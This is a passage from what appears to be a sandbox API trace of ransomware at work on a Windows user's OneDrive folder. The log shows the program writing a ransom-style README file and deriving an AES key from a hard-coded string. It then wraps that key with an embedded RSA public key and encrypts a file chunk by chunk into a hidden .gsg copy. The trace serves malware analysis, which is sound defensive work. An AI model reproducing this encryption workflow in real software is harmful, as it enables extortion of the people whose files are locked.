(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.129] GetFileType (hFile=0x5d4c) returned 0x1 [0276.129] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.130] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.130] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.132] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.132] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.132] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.132] GetLastError () returned 0x0 [0276.132] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.133] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.133] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.134] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.138] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0276.140] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.140] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.140] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.140] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb3c8) returned 1 [0276.141] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.141] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.141] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b400) returned 1 [0276.141] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b400, dwCertEncodingType=0x1, pInfo=0x2f33200*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33230*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33238*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb448) returned 1 [0276.141] CryptEncrypt (in: hKey=0x2fb448, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.141] CryptEncrypt (in: hKey=0x2fb448, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b488*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b488*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.141] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2b488*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b488*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.142] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.150] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.150] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.160] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.161] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.161] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.166] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.167] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 